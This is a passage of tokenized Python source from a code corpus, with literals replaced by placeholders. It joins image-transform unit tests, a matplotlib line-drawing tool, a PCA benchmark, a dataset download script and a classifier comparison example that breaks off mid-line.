] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> ] ) <EOL> def test_stackcopy ( ) : <EOL> layers = <NUM_LIT:4> <EOL> x = np . empty ( ( <NUM_LIT:3> , <NUM_LIT:3> , layers ) ) <EOL> y = np . eye ( <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> _stackcopy ( x , y ) <EOL> for i in range ( layers ) : <EOL> assert_almost_equal ( x [ ... , i ] , y ) <EOL> def test_estimate_transform ( ) : <EOL> for tform in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> estimate_transform ( tform , SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_raises ( ValueError , estimate_transform , '<STR_LIT>' , <EOL> SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> def test_matrix_transform ( ) : <EOL> tform = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.5> ) , rotation = <NUM_LIT:2> ) <EOL> assert_equal ( tform ( SRC ) , matrix_transform ( SRC , tform . params ) ) <EOL> def test_similarity_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:2> , : ] ) , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_equal ( tform . params [ <NUM_LIT:0> , <NUM_LIT:0> ] , tform . params [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert_equal ( tform . params [ <NUM_LIT:0> , <NUM_LIT:1> ] , - tform . params [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> assert_equal ( tform2 . params [ <NUM_LIT:0> , <NUM_LIT:0> ] , tform2 . params [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert_equal ( tform2 . params [ <NUM_LIT:0> , <NUM_LIT:1> ] , - tform2 . params [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> tform3 = SimilarityTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_similarity_init ( ) : <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = <NUM_LIT:1> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> tform2 = SimilarityTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . scale , scale ) <EOL> assert_almost_equal ( tform2 . rotation , rotation ) <EOL> assert_almost_equal ( tform2 . translation , translation ) <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = <NUM_LIT:0> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = np . pi / <NUM_LIT:2> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> def test_affine_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:3> , : ] , DST [ : <NUM_LIT:3> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:3> , : ] ) , DST [ : <NUM_LIT:3> , : ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> tform3 = AffineTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_affine_init ( ) : <EOL> scale = ( <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> rotation = <NUM_LIT:1> <EOL> shear = <NUM_LIT:0.1> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = AffineTransform ( scale = scale , rotation = rotation , shear = shear , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . shear , shear ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> tform2 = AffineTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . scale , scale ) <EOL> assert_almost_equal ( tform2 . rotation , rotation ) <EOL> assert_almost_equal ( tform2 . shear , shear ) <EOL> assert_almost_equal ( tform2 . translation , translation ) <EOL> def test_piecewise_affine ( ) : <EOL> tform = PiecewiseAffineTransform ( ) <EOL> tform . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform ( SRC ) , DST ) <EOL> assert_almost_equal ( tform . inverse ( DST ) , SRC ) <EOL> def test_projective_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:4> , : ] , DST [ : <NUM_LIT:4> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:4> , : ] ) , DST [ : <NUM_LIT:4> , : ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> tform3 = ProjectiveTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_projective_init ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> tform2 = ProjectiveTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:10> ) <EOL> assert_almost_equal ( tform ( SRC ) , DST , <NUM_LIT:6> ) <EOL> tform2 = PolynomialTransform ( ) <EOL> tform2 . estimate ( SRC , DST , order = <NUM_LIT:10> ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_init ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:10> ) <EOL> tform2 = PolynomialTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_default_order ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST , order = <NUM_LIT:2> ) <EOL> assert_almost_equal ( tform2 . params , tform . params ) <EOL> def test_polynomial_inverse ( ) : <EOL> assert_raises ( Exception , PolynomialTransform ( ) . inverse , <NUM_LIT:0> ) <EOL> def test_union ( ) : <EOL> tform1 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform2 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform3 = SimilarityTransform ( scale = <NUM_LIT:0.1> ** <NUM_LIT:2> , rotation = <NUM_LIT> + <NUM_LIT> ) <EOL> tform = tform1 + tform2 <EOL> assert_almost_equal ( tform . params , tform3 . params ) <EOL> tform1 = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> ) , rotation = <NUM_LIT> ) <EOL> tform2 = SimilarityTransform ( scale = <NUM_LIT:0.1> , rotation = <NUM_LIT> ) <EOL> tform3 = SimilarityTransform ( scale = <NUM_LIT:0.1> ** <NUM_LIT:2> , rotation = <NUM_LIT> + <NUM_LIT> ) <EOL> tform = tform1 + tform2 <EOL> assert_almost_equal ( tform . params , tform3 . params ) <EOL> assert tform . __class__ == ProjectiveTransform <EOL> tform = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> ) , rotation = <NUM_LIT> ) <EOL> assert_almost_equal ( ( tform + tform . inverse ) . params , np . eye ( <NUM_LIT:3> ) ) <EOL> def test_union_differing_types ( ) : <EOL> tform1 = SimilarityTransform ( ) <EOL> tform2 = PolynomialTransform ( ) <EOL> assert_raises ( TypeError , tform1 . __add__ , tform2 ) <EOL> def test_geometric_tform ( ) : <EOL> tform = GeometricTransform ( ) <EOL> assert_raises ( NotImplementedError , tform , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , tform . inverse , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , tform . __add__ , <NUM_LIT:0> ) <EOL> def test_invalid_input ( ) : <EOL> assert_raises ( ValueError , ProjectiveTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , AffineTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , SimilarityTransform , np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> assert_raises ( ValueError , AffineTransform , <EOL> matrix = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , scale = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , SimilarityTransform , <EOL> matrix = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , scale = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , PolynomialTransform , np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> def test_degenerate ( ) : <EOL> src = dst = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> tform = SimilarityTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> tform = AffineTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> tform = ProjectiveTransform ( ) <EOL> tform . estimate ( src , dst ) <EOL> assert np . all ( np . isnan ( tform . params ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from numpy . testing import run_module_suite <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from matplotlib import lines <EOL> from ... viewer . canvastools . base import CanvasToolBase , ToolHandles <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class LineTool ( CanvasToolBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , on_move = None , on_release = None , on_enter = None , <EOL> maxdist = <NUM_LIT:10> , line_props = None , handle_props = None , <EOL> ** kwargs ) : <EOL> super ( LineTool , self ) . __init__ ( manager , on_move = on_move , <EOL> on_enter = on_enter , <EOL> on_release = on_release , ** kwargs ) <EOL> props = dict ( color = '<STR_LIT:r>' , linewidth = <NUM_LIT:1> , alpha = <NUM_LIT> , solid_capstyle = '<STR_LIT>' ) <EOL> props . update ( line_props if line_props is not None else { } ) <EOL> self . linewidth = props [ '<STR_LIT>' ] <EOL> self . maxdist = maxdist <EOL> self . _active_pt = None <EOL> x = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> y = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _end_pts = np . transpose ( [ x , y ] ) <EOL> self . _line = lines . Line2D ( x , y , visible = False , animated = True , ** props ) <EOL> self . ax . add_line ( self . _line ) <EOL> self . _handles = ToolHandles ( self . ax , x , y , <EOL> marker_props = handle_props ) <EOL> self . _handles . set_visible ( False ) <EOL> self . artists = [ self . _line , self . _handles . artist ] <EOL> if on_enter is None : <EOL> def on_enter ( pts ) : <EOL> x , y = np . transpose ( pts ) <EOL> print ( "<STR_LIT>" % <EOL> np . sqrt ( np . diff ( x ) ** <NUM_LIT:2> + np . diff ( y ) ** <NUM_LIT:2> ) ) <EOL> self . callback_on_enter = on_enter <EOL> self . manager . add_tool ( self ) <EOL> @ property <EOL> def end_points ( self ) : <EOL> return self . _end_pts . astype ( int ) <EOL> @ end_points . setter <EOL> def end_points ( self , pts ) : <EOL> self . _end_pts = np . asarray ( pts ) <EOL> self . _line . set_data ( np . transpose ( pts ) ) <EOL> self . _handles . set_data ( np . transpose ( pts ) ) <EOL> self . _line . set_linewidth ( self . linewidth ) <EOL> self . set_visible ( True ) <EOL> self . redraw ( ) <EOL> def hit_test ( self , event ) : <EOL> if event . button != <NUM_LIT:1> or not self . ax . in_axes ( event ) : <EOL> return False <EOL> idx , px_dist = self . _handles . closest ( event . x , event . y ) <EOL> if px_dist < self . maxdist : <EOL> self . _active_pt = idx <EOL> return True <EOL> else : <EOL> self . _active_pt = None <EOL> return False <EOL> def on_mouse_press ( self , event ) : <EOL> self . set_visible ( True ) <EOL> if self . _active_pt is None : <EOL> self . _active_pt = <NUM_LIT:0> <EOL> x , y = event . xdata , event . ydata <EOL> self . _end_pts = np . array ( [ [ x , y ] , [ x , y ] ] ) <EOL> def on_mouse_release ( self , event ) : <EOL> if event . button != <NUM_LIT:1> : <EOL> return <EOL> self . _active_pt = None <EOL> self . callback_on_release ( self . geometry ) <EOL> self . redraw ( ) <EOL> def on_move ( self , event ) : <EOL> if event . button != <NUM_LIT:1> or self . _active_pt is None : <EOL> return <EOL> if not self . ax . in_axes ( event ) : <EOL> return <EOL> self . update ( event . xdata , event . ydata ) <EOL> self . callback_on_move ( self . geometry ) <EOL> def update ( self , x = None , y = None ) : <EOL> if x is not None : <EOL> self . _end_pts [ self . _active_pt , : ] = x , y <EOL> self . end_points = self . _end_pts <EOL> @ property <EOL> def geometry ( self ) : <EOL> return self . end_points <EOL> class ThickLineTool ( LineTool ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , on_move = None , on_enter = None , on_release = None , <EOL> on_change = None , maxdist = <NUM_LIT:10> , line_props = None , handle_props = None ) : <EOL> super ( ThickLineTool , self ) . __init__ ( manager , <EOL> on_move = on_move , <EOL> on_enter = on_enter , <EOL> on_release = on_release , <EOL> maxdist = maxdist , <EOL> line_props = line_props , <EOL> handle_props = handle_props ) <EOL> if on_change is None : <EOL> def on_change ( * args ) : <EOL> pass <EOL> self . callback_on_change = on_change <EOL> def on_scroll ( self , event ) : <EOL> if not event . inaxes : <EOL> return <EOL> if event . button == '<STR_LIT>' : <EOL> self . _thicken_scan_line ( ) <EOL> elif event . button == '<STR_LIT>' : <EOL> self . _shrink_scan_line ( ) <EOL> def on_key_press ( self , event ) : <EOL> if event . key == '<STR_LIT:+>' : <EOL> self . _thicken_scan_line ( ) <EOL> elif event . key == '<STR_LIT:->' : <EOL> self . _shrink_scan_line ( ) <EOL> def _thicken_scan_line ( self ) : <EOL> self . linewidth += <NUM_LIT:1> <EOL> self . update ( ) <EOL> self . callback_on_change ( self . geometry ) <EOL> def _shrink_scan_line ( self ) : <EOL> if self . linewidth > <NUM_LIT:1> : <EOL> self . linewidth -= <NUM_LIT:1> <EOL> self . update ( ) <EOL> self . callback_on_change ( self . geometry ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from ... import data <EOL> from ... viewer import ImageViewer <EOL> image = data . camera ( ) <EOL> viewer = ImageViewer ( image ) <EOL> h , w = image . shape <EOL> line_tool = ThickLineTool ( viewer ) <EOL> line_tool . end_points = ( [ w / <NUM_LIT:3> , h / <NUM_LIT:2> ] , [ <NUM_LIT:2> * w / <NUM_LIT:3> , h / <NUM_LIT:2> ] ) <EOL> viewer . show ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import scipy as sp <EOL> import matplotlib as mpl <EOL> import six <EOL> from PIL import Image <EOL> import Cython <EOL> import networkx <EOL> for m in ( np , sp , mpl , six , Image , networkx , Cython ) : <EOL> if m is Image : <EOL> version = m . VERSION <EOL> else : <EOL> version = m . __version__ <EOL> print ( m . __name__ . rjust ( <NUM_LIT:10> ) , '<STR_LIT:U+0020>' , version ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import gc <EOL> from time import time <EOL> from collections import defaultdict <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . datasets import fetch_lfw_people <EOL> from sklearn . decomposition import IncrementalPCA , RandomizedPCA , PCA <EOL> def plot_results ( X , y , label ) : <EOL> plt . plot ( X , y , label = label , marker = '<STR_LIT:o>' ) <EOL> def benchmark ( estimator , data ) : <EOL> gc . collect ( ) <EOL> print ( "<STR_LIT>" % estimator ) <EOL> t0 = time ( ) <EOL> estimator . fit ( data ) <EOL> training_time = time ( ) - t0 <EOL> data_t = estimator . transform ( data ) <EOL> data_r = estimator . inverse_transform ( data_t ) <EOL> reconstruction_error = np . mean ( np . abs ( data - data_r ) ) <EOL> return { '<STR_LIT:time>' : training_time , '<STR_LIT:error>' : reconstruction_error } <EOL> def plot_feature_times ( all_times , batch_size , all_components , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , <EOL> label = "<STR_LIT>" % batch_size ) <EOL> plot_results ( all_components , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % data . shape ) <EOL> plt . xlabel ( "<STR_LIT>" % data . shape [ <NUM_LIT:1> ] ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_feature_errors ( all_errors , batch_size , all_components , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , <EOL> label = "<STR_LIT>" % batch_size ) <EOL> plot_results ( all_components , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" <EOL> "<STR_LIT>" % data . shape ) <EOL> plt . xlabel ( "<STR_LIT>" % data . shape [ <NUM_LIT:1> ] ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_batch_times ( all_times , n_features , all_batch_sizes , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_times [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % ( <EOL> n_features , data . shape [ <NUM_LIT:0> ] , data . shape [ <NUM_LIT:1> ] ) ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def plot_batch_errors ( all_errors , n_features , all_batch_sizes , data ) : <EOL> plt . figure ( ) <EOL> plot_results ( all_batch_sizes , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plot_results ( all_batch_sizes , all_errors [ '<STR_LIT>' ] , label = "<STR_LIT>" ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . suptitle ( "<STR_LIT>" % ( <EOL> n_features , data . shape [ <NUM_LIT:0> ] , data . shape [ <NUM_LIT:1> ] ) ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> def fixed_batch_size_comparison ( data ) : <EOL> all_features = [ i . astype ( int ) for i in np . linspace ( data . shape [ <NUM_LIT:1> ] // <NUM_LIT:10> , <EOL> data . shape [ <NUM_LIT:1> ] , num = <NUM_LIT:5> ) ] <EOL> batch_size = <NUM_LIT:1000> <EOL> all_times = defaultdict ( list ) <EOL> all_errors = defaultdict ( list ) <EOL> for n_components in all_features : <EOL> pca = PCA ( n_components = n_components ) <EOL> rpca = RandomizedPCA ( n_components = n_components , random_state = <NUM_LIT> ) <EOL> ipca = IncrementalPCA ( n_components = n_components , batch_size = batch_size ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , pca ) , <EOL> ( '<STR_LIT>' , ipca ) , <EOL> ( '<STR_LIT>' , rpca ) ] } <EOL> for k in sorted ( results_dict . keys ( ) ) : <EOL> all_times [ k ] . append ( results_dict [ k ] [ '<STR_LIT:time>' ] ) <EOL> all_errors [ k ] . append ( results_dict [ k ] [ '<STR_LIT:error>' ] ) <EOL> plot_feature_times ( all_times , batch_size , all_features , data ) <EOL> plot_feature_errors ( all_errors , batch_size , all_features , data ) <EOL> def variable_batch_size_comparison ( data ) : <EOL> batch_sizes = [ i . astype ( int ) for i in np . linspace ( data . shape [ <NUM_LIT:0> ] // <NUM_LIT:10> , <EOL> data . shape [ <NUM_LIT:0> ] , num = <NUM_LIT:10> ) ] <EOL> for n_components in [ i . astype ( int ) for i in <EOL> np . linspace ( data . shape [ <NUM_LIT:1> ] // <NUM_LIT:10> , <EOL> data . shape [ <NUM_LIT:1> ] , num = <NUM_LIT:4> ) ] : <EOL> all_times = defaultdict ( list ) <EOL> all_errors = defaultdict ( list ) <EOL> pca = PCA ( n_components = n_components ) <EOL> rpca = RandomizedPCA ( n_components = n_components , random_state = <NUM_LIT> ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , pca ) , <EOL> ( '<STR_LIT>' , rpca ) ] } <EOL> all_times [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_errors [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_times [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> all_errors [ '<STR_LIT>' ] . extend ( [ results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ] * <EOL> len ( batch_sizes ) ) <EOL> for batch_size in batch_sizes : <EOL> ipca = IncrementalPCA ( n_components = n_components , <EOL> batch_size = batch_size ) <EOL> results_dict = { k : benchmark ( est , data ) for k , est in [ ( '<STR_LIT>' , <EOL> ipca ) ] } <EOL> all_times [ '<STR_LIT>' ] . append ( results_dict [ '<STR_LIT>' ] [ '<STR_LIT:time>' ] ) <EOL> all_errors [ '<STR_LIT>' ] . append ( results_dict [ '<STR_LIT>' ] [ '<STR_LIT:error>' ] ) <EOL> plot_batch_times ( all_times , n_components , batch_sizes , data ) <EOL> plot_batch_errors ( all_errors , n_components , batch_sizes , data ) <EOL> faces = fetch_lfw_people ( resize = <NUM_LIT> , min_faces_per_person = <NUM_LIT:5> ) <EOL> X = faces . data [ : <NUM_LIT> ] <EOL> n_samples , h , w = faces . images . shape <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> X -= X . mean ( axis = <NUM_LIT:0> ) <EOL> X /= X . std ( axis = <NUM_LIT:0> ) <EOL> fixed_batch_size_comparison ( X ) <EOL> variable_batch_size_comparison ( X ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tarfile <EOL> from contextlib import closing <EOL> try : <EOL> from urllib import urlopen <EOL> except ImportError : <EOL> from urllib . request import urlopen <EOL> URL = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ARCHIVE_NAME = URL . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> DATA_FOLDER = "<STR_LIT>" <EOL> if not os . path . exists ( DATA_FOLDER ) : <EOL> if not os . path . exists ( ARCHIVE_NAME ) : <EOL> print ( "<STR_LIT>" % URL ) <EOL> opener = urlopen ( URL ) <EOL> with open ( ARCHIVE_NAME , '<STR_LIT:wb>' ) as archive : <EOL> archive . write ( opener . read ( ) ) <EOL> print ( "<STR_LIT>" % ARCHIVE_NAME ) <EOL> with closing ( tarfile . open ( ARCHIVE_NAME , "<STR_LIT>" ) ) as archive : <EOL> archive . extractall ( path = '<STR_LIT:.>' ) <EOL> os . remove ( ARCHIVE_NAME ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from matplotlib . colors import ListedColormap <EOL> from sklearn . model_selection import train_test_split <EOL> from sklearn . preprocessing import StandardScaler <EOL> from sklearn . datasets import make_moons , make_circles , make_classification <EOL> from sklearn . neural_network import MLPClassifier <EOL> from sklearn . neighbors import KNeighborsClassifier <EOL> from sklearn . svm import SVC <EOL> from sklearn . gaussian_process import GaussianProcessClassifier <EOL> from sklearn . gaussian_process . kernels import RBF <EOL> from sklearn . tree import DecisionTreeClassifier <EOL> from sklearn . ensemble import RandomForestClassifier , AdaBoostClassifier <EOL> from sklearn . naive_bayes import GaussianNB <EOL> from sklearn . discriminant_analysis import QuadraticDiscriminantAnalysis <EOL> h = <NUM_LIT> <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> classifiers = [ <EOL> KNeighborsClassifier ( <NUM_LIT:3> ) , <EOL> SVC ( kernel = "<STR_LIT>" , C = <NUM_LIT> ) , <EOL> SVC ( gamma = <NUM_LIT:2> , C = <NUM_LIT:1> ) , <EOL> GaussianProcessClassifier ( <NUM_LIT:1.0> * RBF ( <NUM_LIT:1.0> ) , warm_start = True ) , <EOL> DecisionTreeClassifier ( max_depth = <NUM_LIT:5> ) , <EOL> RandomForestClassifier ( max_depth = <NUM_LIT:5> , n_estimators = <NUM_LIT:10> , max_features = <NUM_LIT:1> ) , <EOL> MLPClassifier ( alpha = <NUM_LIT:1> ) , <EOL> AdaBoostClassifier ( ) , <EOL> GaussianNB ( ) , <EOL> QuadraticDiscriminantAnalysis ( ) ] <EOL> X , y = make_classification ( n_features = <NUM_LIT:2> , n_redundant = <NUM_LIT:0> , n_informative = <NUM_LIT:2> , <EOL> random_state = <NUM_LIT:1> , n_clusters_per_class = <NUM_LIT:1> ) <EOL> rng = np . random . RandomState ( <NUM_LIT:2> ) <EOL> X += <NUM_LIT:2> * rng . uniform ( size = X . shape ) <EOL> linearly_separable = ( X , y ) <EOL> datasets = [ make_moons ( noise = <NUM_LIT> , random_state = <NUM_LIT:0> ) , <EOL> make_circles ( noise = <NUM_LIT> , factor = <NUM_LIT:0.5> , random_state = <NUM_LIT:1> ) , <EOL> linearly_separable <EOL> ] <EOL> figure = plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:9> ) ) <EOL> i = <NUM_LIT:1> <EOL> for ds_cnt , ds in enumerate ( datasets ) : <EOL> X , y = ds <EOL> X = StandardScaler ( ) . fit_transform ( X ) <EOL> X_train , X_test , y_train , y_test = train_test_split ( X , y , test_size = <NUM_LIT> , random_state = <NUM_LIT> ) <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) - <NUM_LIT> , X [ : , <NUM_LIT:0> ] . max ( ) + <NUM_LIT> <EOL> y_min , y_max = X [ : , <NUM_LIT:1> ] . min ( ) - <NUM_LIT> , X [ : , <NUM_LIT:1> ] . max ( ) + <NUM_LIT> <EOL> xx , yy = np . meshgrid ( np . arange ( x_min , x_max , h ) , <EOL> np . arange ( y_min , y_max , h ) ) <EOL> cm = plt . cm . RdBu <EOL> cm_bright = ListedColormap ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ax = plt . subplot ( len ( datasets ) , len ( classifiers ) + <NUM_LIT:1> , i ) <EOL> if ds_cnt == <NUM_LIT:0> : <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> ax . scatter ( X_train [ : , <NUM_LIT:0> ] , X_train [ : , <NUM_LIT:1> ] , c = y_train , cmap = cm_bright ) <EOL> ax . scatter ( X_test [ : , <NUM_LIT:0> ] , X_test [ : , <NUM_LIT:1> ] , c = y_test , cmap = cm_bright , alpha = <NUM_LIT> ) <EOL> ax . set_xlim ( xx . min ( ) , xx . max ( ) ) <EOL> ax . set_ylim ( yy . min ( ) , yy . max ( ) ) <EOL> ax . set_xticks ( ( ) ) <EOL> ax . set_yticks ( ( ) ) <EOL> i += <NUM_LIT:1> <EOL> for name , clf in zip ( names , classifiers ) : <EOL> ax = plt . subplot ( len ( datasets ) , len ( classifiers ) + <NUM_LIT:1> , i ) <EOL> clf . fit ( X_train , y_train ) <EOL> score = clf . score ( X_test , y_test ) <EOL> if hasattr ( clf , "<STR_LIT>" ) : <EOL> Z = clf . decision_function ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) <EOL> else : <EOL> Z = clf . predict_proba ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) [ : , <NUM_LIT:1> ] <EOL> Z = Z . reshape ( xx . shape ) <EOL> ax . contourf ( xx , yy , Z , cmap = cm , alpha = <NUM_LIT> ) <EOL> ax . scatter ( X_train [ : , <NUM_LIT:0> ] , X_train [ : , <NUM_LIT:1> ] , c = y_train , cmap = cm_bright ) <EOL> ax . scatter ( X_test [ : , <NUM_LIT:0> ] , X_test [ : , 